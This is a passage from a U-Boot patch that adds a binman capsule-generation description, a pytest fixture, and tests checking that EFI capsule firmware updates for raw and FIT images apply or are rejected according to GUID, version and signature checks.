itb { + filename = UBOOT_FIT_IMAGE; + + fit { + description = "Automatic U-Boot environment update"; + #address-cells = <2>; + + images { + u-boot-bin { + description = "U-Boot binary on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + u-boot-env { + description = "U-Boot environment on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot-env:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + }; + }; + }; + + capsule1 { + filename = "Test04"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule2 { + filename = "Test05"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_INCORRECT_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule3 { + filename = "Test104"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule4 { + filename = "Test105"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule5 { + filename = "Test13"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule6 { + filename = "Test14"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_INVAL_KEY; + public-key-cert = CAPSULE_INVAL_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + 
}; + }; + + capsule7 { + filename = "Test114"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule8 { + filename = "Test115"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; +}; diff --git a/test/py/tests/test_efi_capsule/conftest.py b/test/py/tests/test_efi_capsule/conftest.py new file mode 100644 index 00000000000..61eab5112a1 --- /dev/null +++ b/test/py/tests/test_efi_capsule/conftest.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI capsule test.""" + +import os + +from subprocess import call, check_call, CalledProcessError +import pytest +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR, EFITOOLS_PATH + +@pytest.fixture(scope='session') +def efi_capsule_data(request, u_boot_config): + """Set up a file system and return path to image. + + The function sets up a file system to be used in UEFI capsule and + authentication test and returns a path to disk image to be used + for testing. + + request -- Pytest request object. + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + data_dir = mnt_point + CAPSULE_DATA_DIR + install_dir = mnt_point + CAPSULE_INSTALL_DIR + image_path = u_boot_config.persistent_data_dir + '/test_efi_capsule.img' + + try: + # Create a target device + check_call('dd if=/dev/zero of=./spi.bin bs=1MiB count=16', shell=True) + + check_call('rm -rf %s' % mnt_point, shell=True) + check_call('mkdir -p %s' % data_dir, shell=True) + check_call('mkdir -p %s' % install_dir, shell=True) + + capsule_auth_enabled = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + key_dir = u_boot_config.source_dir + '/board/sandbox' + if capsule_auth_enabled: + # Get the keys from the board directory + check_call('cp %s/capsule_priv_key_good.key %s/SIGNER.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_good.crt %s/SIGNER.crt' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_esl_good.esl %s/SIGNER.esl' + % (key_dir, data_dir), shell=True) + + check_call('cp %s/capsule_priv_key_bad.key %s/SIGNER2.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_bad.crt %s/SIGNER2.crt' + % (key_dir, data_dir), shell=True) + + # Update dtb to add the version information + check_call('cd %s; ' + 'cp %s/test/py/tests/test_efi_capsule/version.dtso .' 
+ % (data_dir, u_boot_config.source_dir), shell=True) + + if capsule_auth_enabled: + check_call('cd %s; ' + 'cp %s/arch/sandbox/dts/test.dtb test_sig.dtb' + % (data_dir, u_boot_config.build_dir), shell=True) + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dtso; ' + 'fdtoverlay -i test_sig.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir), shell=True) + else: + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dtso; ' + 'fdtoverlay -i %s/arch/sandbox/dts/test.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir, u_boot_config.build_dir), shell=True) + + # two regions: one for u-boot.bin and the other for u-boot.env + check_call('cd %s; echo -n u-boot:Old > u-boot.bin.old; echo -n u-boot:New > u-boot.bin.new; echo -n u-boot-env:Old > u-boot.env.old; echo -n u-boot-env:New > u-boot.env.new' % data_dir, + shell=True) + + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/scripts/dtc/pylibfdt' % u_boot_config.build_dir + check_call('cd %s; ' + 'cc -E -I %s/include -x assembler-with-cpp -o capsule_gen_tmp.dts %s/test/py/tests/test_efi_capsule/capsule_gen_binman.dts; ' + 'dtc -I dts -O dtb capsule_gen_tmp.dts -o capsule_binman.dtb;' + % (data_dir, u_boot_config.source_dir, u_boot_config.source_dir), shell=True) + check_call('cd %s; ' + './tools/binman/binman --toolpath %s/tools build -u -d %s/capsule_binman.dtb -O %s -m --allow-missing -I %s -I ./board/sandbox -I ./arch/sandbox/dts' + % (u_boot_config.source_dir, u_boot_config.build_dir, data_dir, data_dir, data_dir), shell=True) + check_call('cp %s/Test* %s' % (u_boot_config.build_dir, data_dir), shell=True) + os.environ['PYTHONPATH'] = pythonpath + + # Create a disk image with EFI system partition + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat %s %s' % + (mnt_point, image_path), shell=True) + check_call('sgdisk %s -A 1:set:0 -t 1:C12A7328-F81F-11D2-BA4B-00A0C93EC93B' % + image_path, shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -rf %s' % mnt_point, shell=True) + call('rm -f %s' % image_path, shell=True) + call('rm -f ./spi.bin', shell=True) diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py new file mode 100644 index 00000000000..016274533cd --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py @@ -0,0 +1,183 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareFit(): + """Test capsule-on-disk firmware update for FIT images + """ + + def 
test_efi_capsule_fw1( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + ubman.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test05'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + # reboot + ubman.restart_uboot(expect_reset = capsule_early) + + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + disk_img = efi_capsule_data + capsule_files = ['Test04'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + ubman.restart_uboot(expect_reset = capsule_early) + + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(ubman, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(ubman, '150000', expected) + + def test_efi_capsule_fw3( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test104'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, 
disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw4( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test105'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py new file mode 100644 index 00000000000..b8cb483b380 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py @@ -0,0 +1,240 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +""" U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + check_file_exist, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareRaw: + """ Tests verifying capsule-on-disk firmware update for raw images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. 
+ ubman.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test03'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + ubman.restart_uboot() + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash but with OsIndications unset + No update should happen unless CONFIG_EFI_IGNORE_OSINDICATIONS is set + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, None) + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + ubman.restart_uboot() + + ignore_os_indications = u_boot_config.buildconfig.get( + 'config_efi_ignore_osindications') + need_reboot = True if ignore_os_indications else False + + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files, need_reboot) + + if not ignore_os_indications: + check_file_exist(ubman, disk_img, capsule_files) + + expected = 'u-boot:New' if (ignore_os_indications and not capsule_auth) else 'u-boot:Old' + verify_content(ubman, '100000', expected) + + expected = 'u-boot-env:New' if (ignore_os_indications and not capsule_auth) else 'u-boot-env:Old' + verify_content(ubman, '150000', expected) + + def test_efi_capsule_fw3( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + ubman.restart_uboot(expect_reset = capsule_early) + + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. 
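+            # (The ESRT is the EFI System Resource Table, which reports the
+            # updatable firmware images and their versions to the OS.)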
+ output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '9E339473-C2EB-530A-A69B-0CD6BBBED40E' in ''.join(output) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + + check_file_removed(ubman, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(ubman, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(ubman, '150000', expected) + + def test_efi_capsule_fw4( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test101', 'Test102'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. 
+ assert '9E339473-C2EB-530A-A69B-0CD6BBBED40E' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw5( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 5 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test103'] + with ubman.log.section('Test Case 5-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py new file mode 100644 index 00000000000..29545c5080a --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Copyright (c) 2022, Arm Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org>, +# adapted to FIT images by Vincent Stehlé <vincent.stehle@arm.com> + +"""U-Boot UEFI: Firmware Update (Signed capsule with FIT images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedFit(): + """Capsule-on-disk firmware update test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 1 + Update U-Boot on SPI Flash, FIT image format + x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. 
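+        Test13 is the capsule generated through binman with the valid
+        signing key (see capsule_gen_binman.dts).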
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test13'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 2 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test14'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted any way + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 3 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted any way + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. 
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test114'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '46610520-469E-59DC-A8DD-C11832B877EA' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test115'] + with ubman.log.section('Test Case 5-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py new file mode 100644 index 00000000000..a500c499bb9 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py @@ -0,0 +1,192 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update (Signed capsule with raw images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') 